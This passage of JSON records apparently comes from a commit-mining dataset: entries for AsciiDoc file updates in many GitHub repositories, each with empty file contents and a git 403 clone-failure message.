\/spring-boot,drunklite\/spring-boot,michael-simons\/spring-boot,gauravbrills\/spring-boot,izeye\/spring-boot,zorosteven\/spring-boot,smayoorans\/spring-boot,buobao\/spring-boot,cbtpro\/spring-boot,jack-luj\/spring-boot,bijukunjummen\/spring-boot,jvz\/spring-boot,trecloux\/spring-boot,rizwan18\/spring-boot,nghiavo\/spring-boot,gauravbrills\/spring-boot,rmoorman\/spring-boot,felipeg48\/spring-boot,VitDevelop\/spring-boot,166yuan\/spring-boot,AstaTus\/spring-boot,patrikbeno\/spring-boot,vakninr\/spring-boot,wilkinsona\/spring-boot,domix\/spring-boot,michael-simons\/spring-boot,zorosteven\/spring-boot,jayarampradhan\/spring-boot,murilobr\/spring-boot,auvik\/spring-boot,bsodzik\/spring-boot,sbcoba\/spring-boot,liupugong\/spring-boot,isopov\/spring-boot,eliudiaz\/spring-boot,qq83387856\/spring-boot,izestrea\/spring-boot,auvik\/spring-boot,paddymahoney\/spring-boot,donhuvy\/spring-boot,hello2009chen\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jvz\/spring-boot,RichardCSantana\/spring-boot,nebhale\/spring-boot,jeremiahmarks\/spring-boot,snicoll\/spring-boot,lenicliu\/spring-boot,smayoorans\/spring-boot,Nowheresly\/spring-boot,PraveenkumarShethe\/spring-boot,bclozel\/spring-boot,crackien\/spring-boot,akmaharshi\/jenkins,satheeshmb\/spring-boot,mosen11\/spring-boot,soul2zimate\/spring-boot,i007422\/jenkins2-course-spring-boot,aahlenst\/spring-boot,rweisleder\/spring-boot,rmoorman\/spring-boot,bclozel\/spring-boot,kdvolder\/spring-boot,krmcbride\/spring-boot,mbogoevici\/spring-boot,jcastaldoFoodEssentials\/spring-boot,zhanhb\/spring-boot,ollie314\/spring-boot,jayeshmuralidharan\/spring-boot,Buzzardo\/spring-boot,sankin\/spring-boot,ralenmandao\/spring-boot,zhanhb\/spring-boot,RishikeshDarandale\/spring-boot,lburgazzoli\/spring-boot,yangdd1205\/spring-boot,christian-posta\/spring-boot,MrMitchellMoore\/spring-boot,linead\/spring-boot,rstirling\/spring-boot,ollie314\/spring-boot,MrMitchellMoore\/spring-boot,lenicliu\/spring-boot,cmsandiga\/spring-boot,nurkiewicz\/spring-boot,mosen11\/spring-boot,chrylis\/spring-boot,eric-stanley\/spring-boot,balajinsr\/spring-boot,christian-posta\/spring-boot,frost2014\/spring-boot,mlc0202\/spring-boot,fireshort\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,RishikeshDarandale\/spring-boot,lexandro\/spring-boot,huangyugui\/spring-boot,coolcao\/spring-boot,imranansari\/spring-boot,prasenjit-net\/spring-boot,Buzzardo\/spring-boot,joshiste\/spring-boot,nevenc-pivotal\/spring-boot,MrMitchellMoore\/spring-boot,rweisleder\/spring-boot,srikalyan\/spring-boot,brettwooldridge\/spring-boot,Pokbab\/spring-boot,MrMitchellMoore\/spring-boot,RichardCSantana\/spring-boot,philwebb\/spring-boot-concourse,spring-projects\/spring-boot,sungha\/spring-boot,rweisleder\/spring-boot,tan9\/spring-boot,mohican0607\/spring-boot,prakashme\/spring-boot,srikalyan\/spring-boot,ameraljovic\/spring-boot,yhj630520\/spring-boot,DeezCashews\/spring-boot,forestqqqq\/spring-boot,mdeinum\/spring-boot,liupd\/spring-boot,orangesdk\/spring-boot,nghiavo\/spring-boot,RichardCSantana\/spring-boot,Pokbab\/spring-boot,M3lkior\/spring-boot,deki\/spring-boot,Xaerxess\/spring-boot,mbogoevici\/spring-boot,yhj630520\/spring-boot,panbiping\/spring-boot,rizwan18\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,joshthornhill\/spring-boot,playleud\/spring-boot,candrews\/spring-boot,bclozel\/spring-boot,hehuabing\/spring-boot,roymanish\/spring-boot,master-slave\/spring-boot,fulvio-m\/spring-boot,xc145214\/spring-boot,rams2588\/spring-boot,olivergierke\/spring-boot,neo4j-contrib\/spring-boot,durai145\/spring-boot,drumonii\/spring-boot,gauravbrills\/spring-boot,allyjunio\/spring-boot,mlc0202\/spring-boot,dnsw83\/spring-boot,yhj630520\/spring-boot,dfa1\/spring-boot,nghialunhaiha\/spring-boot,krmcbride\/spring-boot,SPNilsen\/spring-boot,master-slave\/spring-boot,mbnshankar\/spring-boot,royclarkson\/spring-boot,javyzheng\/spring-boot,mbrukman\/spring-boot,thomasdarimont\/spring-boot,okba1\/spring-boot,tbadie\/spring-boot,nareshmiriyala\/spring-boot,peteyan\/spring-boot,xingguang2013\/spring-boot,rweisleder\/spring-boot,kamilszymanski\/spring-boot,damoyang\/spring-boot,eonezhang\/spring-boot,navarrogabriela\/spring-boot,hklv\/spring-boot,keithsjohnson\/spring-boot,RainPlanter\/spring-boot,hehuabing\/spring-boot,mabernardo\/spring-boot,dreis2211\/spring-boot,liupugong\/spring-boot,npcode\/spring-boot,murilobr\/spring-boot,ptahchiev\/spring-boot,javyzheng\/spring-boot,jbovet\/spring-boot,rickeysu\/spring-boot,joshiste\/spring-boot,michael-simons\/spring-boot,peteyan\/spring-boot,marcellodesales\/spring-boot,ihoneymon\/spring-boot,joansmith\/spring-boot,DeezCashews\/spring-boot,royclarkson\/spring-boot,lburgazzoli\/spring-boot,scottfrederick\/spring-boot,prakashme\/spring-boot,nisuhw\/spring-boot,Xaerxess\/spring-boot,playleud\/spring-boot,nelswadycki\/spring-boot,nevenc-pivotal\/spring-boot,eonezhang\/spring-boot,htynkn\/spring-boot,mike-kukla\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,chrylis\/spring-boot,ralenmandao\/spring-boot,balajinsr\/spring-boot,mackeprm\/spring-boot,xdweleven\/spring-boot,meloncocoo\/spring-boot,linead\/spring-boot,tbbost\/spring-boot,kdvolder\/spring-boot,xwjxwj30abc\/spring-boot,pvorb\/spring-boot,ChunPIG\/spring-boot,simonnordberg\/spring-boot,jcastaldoFoodEssentials\/spring-boot,michael-simons\/spring-boot,shakuzen\/spring-boot,RainPlanter\/spring-boot,wwadge\/spring-boot,htynkn\/spring-boot,pvorb\/spring-boot,gorcz\/spring-boot,ameraljovic\/spring-boot,SPNilsen\/spring-boot,ydsakyclguozi\/spring-boot,mouadtk\/spring-boot,npcode\/spring-boot,paddymahoney\/spring-boot,sebastiankirsch\/spring-boot,brettwooldridge\/spring-boot,fogone\/spring-boot,tiarebalbi\/spring-boot,jack-luj\/spring-boot,duandf35\/spring-boot,ractive\/spring-boot,afroje-reshma\/spring-boot-sample,michael-simons\/spring-boot,lucassaldanha\/spring-boot,shakuzen\/spring-boot,ApiSecRay\/spring-boot,spring-projects\/spring-boot,MasterRoots\/spring-boot,SaravananParthasarathy\/SPSDemo,xwjxwj30abc\/spring-boot,mbogoevici\/spring-boot,isopov\/spring-boot,srikalyan\/spring-boot,fireshort\/spring-boot,designreuse\/spring-boot,SPNilsen\/spring-boot,chrylis\/spring-boot,mosoft521\/spring-boot,ChunPIG\/spring-boot,paweldolecinski\/spring-boot,VitDevelop\/spring-boot,zhanhb\/spring-boot,cbtpro\/spring-boot,tbbost\/spring-boot,allyjunio\/spring-boot,lif123\/spring-boot,dreis2211\/spring-boot,candrews\/spring-boot,jforge\/spring-boot,peteyan\/spring-boot,patrikbeno\/spring-boot,shangyi0102\/spring-boot,roberthafner\/spring-boot,tsachev\/spring-boot,designreuse\/spring-boot,coolcao\/spring-boot,philwebb\/spring-boot,thomasdarimont\/spring-boot,trecloux\/spring-boot,mbrukman\/spring-boot,donthadineshkumar\/spring-boot,gauravbrills\/spring-boot,auvik\/spring-boot,chrylis\/spring-boot,10045125\/spring-boot,ihoneymon\/spring-boot,jrrickard\/spring-boot,donhuvy\/spring-boot,MasterRoots\/spring-boot,eddumelendez\/spring-boot,lokbun\/spring-boot,roymanish\/spring-boot,felipeg48\/spring-boot,sankin\/spring-boot,jforge\/spring-boot,isopov\/spring-boot,deki\/spring-boot,patrikbeno\/spring-boot,end-user\/spring-boot,RainPlanter\/spring-boot,jcastaldoFoodEssentials\/spring-boot,jmnarloch\/spring-boot,ApiSecRay\/spring-boot,xiaoleiPENG\/my-project,Xaerxess\/spring-boot,meftaul\/spring-boot,rizwan18\/spring-boot,jmnarloch\/spring-boot,allyjunio\/spring-boot,cbtpro\/spring-boot,panbiping\/spring-boot,mbenson\/spring-boot,axibase\/spring-boot,aahlenst\/spring-boot,forestqqqq\/spring-boot,drumonii\/spring-boot,clarklj001\/spring-boot,okba1\/spring-boot,rizwan18\/spring-boot,fogone\/spring-boot,ChunPIG\/spring-boot,zhangshuangquan\/spring-root,chrylis\/spring-boot,meloncocoo\/spring-boot,raiamber1\/spring-boot,Makhlab\/spring-boot,jack-luj\/spring-boot,jayeshmuralidharan\/spring-boot,sbcoba\/spring-boot,soul2zimate\/spring-boot,tsachev\/spring-boot,nelswadycki\/spring-boot,kayelau\/spring-boot,neo4j-contrib\/spring-boot,meloncocoo\/spring-boot,AngusZhu\/spring-boot,xialeizhou\/spring-boot,jxblum\/spring-boot,nurkiewicz\/spring-boot,scottfrederick\/spring-boot,Xaerxess\/spring-boot,ractive\/spring-boot,fireshort\/spring-boot,hqrt\/jenkins2-course-spring-boot,ihoneymon\/spring-boot,hqrt\/jenkins2-course-spring-boot,cbtpro\/spring-boot,shangyi0102\/spring-boot,fulvio-m\/spring-boot,tiarebalbi\/spring-boot,ojacquemart\/spring-boot,eliudiaz\/spring-boot,ameraljovic\/spring-boot,fulvio-m\/spring-boot,xialeizhou\/spring-boot,shakuzen\/spring-boot,minmay\/spring-boot,fjlopez\/spring-boot,i007422\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,xc145214\/spring-boot,allyjunio\/spring-boot,buobao\/spring-boot,nebhale\/spring-boot,ollie314\/spring-boot,nebhale\/spring-boot,jvz\/spring-boot,spring-projects\/spring-boot,AstaTus\/spring-boot,frost2014\/spring-boot,lburgazzoli\/spring-boot,bijukunjummen\/spring-boot,smayoorans\/spring-boot,eonezhang\/spring-boot,allyjunio\/spring-boot,nghialunhaiha\/spring-boot,5zzang\/spring-boot,sbcoba\/spring-boot,Nowheresly\/spring-boot,liupd\/spring-boot,tiarebalbi\/spring-boot,donthadineshkumar\/spring-boot,lexandro\/spring-boot,rickeysu\/spring-boot,vaseemahmed01\/spring-boot,MrMitchellMoore\/spring-boot,dnsw83\/spring-boot,wwadge\/spring-boot,designreuse\/spring-boot,DONIKAN\/spring-boot,mosoft521\/spring-boot,jxblum\/spring-boot,RobertNickens\/spring-boot,master-slave\/spring-boot,ihoneymon\/spring-boot,hehuabing\/spring-boot,lenicliu\/spring-boot,mike-kukla\/spring-boot","old_file":"spring-boot-starters\/README.adoc","new_file":"spring-boot-starters\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/soul2zimate\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e0d9dc2fd13e171cbecdbf17230349ca8d6e31b8","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abe88d2e16ccc849dcbc8d89ada14d9b0f785174","subject":"Update 2015-06-18-hello-word.adoc","message":"Update 2015-06-18-hello-word.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-hello-word.adoc","new_file":"_posts\/2015-06-18-hello-word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a064af427e716c93f0af0c80cf28cb525087361e","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"154fc1e08b8c0da4cf8ac9411c409cf38a724b60","subject":"Update 2016-07-16-Blog-Title.adoc","message":"Update 2016-07-16-Blog-Title.adoc","repos":"hiun\/hubpress.io,hiun\/hubpress.io,hiun\/hubpress.io,hiun\/hubpress.io","old_file":"_posts\/2016-07-16-Blog-Title.adoc","new_file":"_posts\/2016-07-16-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hiun\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c9e8db3f25fb1c11f06acd2099fcff81f8d741c","subject":"put GEP-1 page from codehaus into website","message":"put GEP-1 page from codehaus into website\n","repos":"groovy\/groovy-website,groovy\/groovy-website","old_file":"site\/src\/site\/wiki\/GEP-1.adoc","new_file":"site\/src\/site\/wiki\/GEP-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/groovy\/groovy-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef4c63c4e6a389f4eb65a8a4ebe98a63186f1e0e","subject":"Add tip for GUI components with Vaadin 8 (#8899)","message":"Add tip for GUI components with Vaadin 8 (#8899)\n\n* Use difference GUI component for Vaadin 8 \n\nWith Vaadin Framework 8, Tutorial learner should use different setting and component for form development\n\n* Better explanation\n","repos":"peterl1084\/framework,kironapublic\/vaadin,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,kironapublic\/vaadin,asashour\/framework,kironapublic\/vaadin,peterl1084\/framework,kironapublic\/vaadin,peterl1084\/framework,mstahv\/framework,peterl1084\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,peterl1084\/framework,kironapublic\/vaadin,Darsstar\/framework,asashour\/framework,Darsstar\/framework","old_file":"documentation\/tutorial.adoc","new_file":"documentation\/tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5522e7ac418ff37a90fb99319a5ae3276a4ec353","subject":"Update 2015-07-10-La-Musique-1-Le-Metal.adoc","message":"Update 2015-07-10-La-Musique-1-Le-Metal.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-07-10-La-Musique-1-Le-Metal.adoc","new_file":"_posts\/2015-07-10-La-Musique-1-Le-Metal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"461440ed19a9dd2fe350de279f2b71117d7aae56","subject":"Update 2017-02-20-Sala-de-Chat-Privado2.adoc","message":"Update 2017-02-20-Sala-de-Chat-Privado2.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2017-02-20-Sala-de-Chat-Privado2.adoc","new_file":"_posts\/2017-02-20-Sala-de-Chat-Privado2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b94315484cddab482f3f50e4e3e9e1654d802dec","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a43e08ae75ce3cc4305843f88bce1a043b256b53","subject":"pequenas corre\u00e7\u00f5es de portugu\u00eas","message":"pequenas corre\u00e7\u00f5es de portugu\u00eas","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1677ceb5a1b75142970635e6e4f8167f7dd90ce8","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ae56c66cfa07fee76209d704f5c3e958b27525a","subject":"Sample pom","message":"Sample pom\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"IBM Cloud.adoc","new_file":"IBM Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30c77d9bf8a504a98428c3377a50ba75769772dd","subject":"Update 2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","message":"Update 2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","new_file":"_posts\/2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b2b614372f10874ebc37bc8246787b6e8ecd679","subject":"Update 2017-04-05-again.adoc","message":"Update 2017-04-05-again.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-05-again.adoc","new_file":"_posts\/2017-04-05-again.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc5168db082f10df159f37097c4902271e4828f1","subject":"Delete the file at '_posts\/2017-05-03-Intro.adoc'","message":"Delete the file at '_posts\/2017-05-03-Intro.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"768fb83b46539e0c1fa1e7e814a9da24fa096541","subject":"Update 2017-07-28-mecab.adoc","message":"Update 2017-07-28-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-mecab.adoc","new_file":"_posts\/2017-07-28-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b119f1a5dfbf16eef1054b426ee8f2966cbf822a","subject":"Update 2016-04-12-test.adoc","message":"Update 2016-04-12-test.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-04-12-test.adoc","new_file":"_posts\/2016-04-12-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f39cced6c0d4ec78e39bab4a4dbd71d2aa0cc168","subject":"Update 2014-12-30-Code-metrics.adoc","message":"Update 2014-12-30-Code-metrics.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-12-30-Code-metrics.adoc","new_file":"_posts\/2014-12-30-Code-metrics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb6cae3e5db72b2bfda04fde8fcada8abe49b8bc","subject":"Update 2018-04-20-Java-Puzzles.adoc","message":"Update 2018-04-20-Java-Puzzles.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-04-20-Java-Puzzles.adoc","new_file":"_posts\/2018-04-20-Java-Puzzles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32978edc23d996647b651be80a9957f615c4f0af","subject":"Update 2018-07-13-test20180713.adoc","message":"Update 2018-07-13-test20180713.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-13-test20180713.adoc","new_file":"_posts\/2018-07-13-test20180713.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25ee0cd50ab0b47d71f3fe26db2dd3082bc0f0d4","subject":"Update 2016-05-08-Query-Optimization-101.adoc","message":"Update 2016-05-08-Query-Optimization-101.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-05-08-Query-Optimization-101.adoc","new_file":"_posts\/2016-05-08-Query-Optimization-101.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2398804f29c28daf16055d8dfe45476a6b284470","subject":"Update 2016-11-08-181300-Tuesday-Workday.adoc","message":"Update 2016-11-08-181300-Tuesday-Workday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-08-181300-Tuesday-Workday.adoc","new_file":"_posts\/2016-11-08-181300-Tuesday-Workday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34cf97760e5d76ade47439af706052981f5add50","subject":"Update 2018-07-12-Architectural-Thinking.adoc","message":"Update 2018-07-12-Architectural-Thinking.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-07-12-Architectural-Thinking.adoc","new_file":"_posts\/2018-07-12-Architectural-Thinking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"241e0743b7beda0e026c4221fe82f35188face5c","subject":"Added snapshot","message":"Added snapshot\n","repos":"bodiam\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,yole\/asciidoctor-intellij-plugin,yole\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,McPringle\/asciidoctor-intellij-plugin,ehmkah\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,yole\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,ehmkah\/asciidoctor-intellij-plugin,harrol\/asciidoctor-intellij-plugin,ehmkah\/asciidoctor-intellij-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ehmkah\/asciidoctor-intellij-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9568a854c6b1682d88afae749a764d78b76b7539","subject":"Update 2015-12-14-Foo.adoc","message":"Update 2015-12-14-Foo.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2015-12-14-Foo.adoc","new_file":"_posts\/2015-12-14-Foo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f6184e3a725a5da76d867fb47f65ea54d23a5fb","subject":"Update 2016-7-2-thinphp.adoc","message":"Update 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-2-thinphp.adoc","new_file":"_posts\/2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30e50939cc36ddc2f0bf5e238fabda7ffb8b9512","subject":"Update 2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","message":"Update 2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"891a15db22357857c1422608df9551e215136af6","subject":"Add breaking changes for 6.0","message":"Add breaking changes for 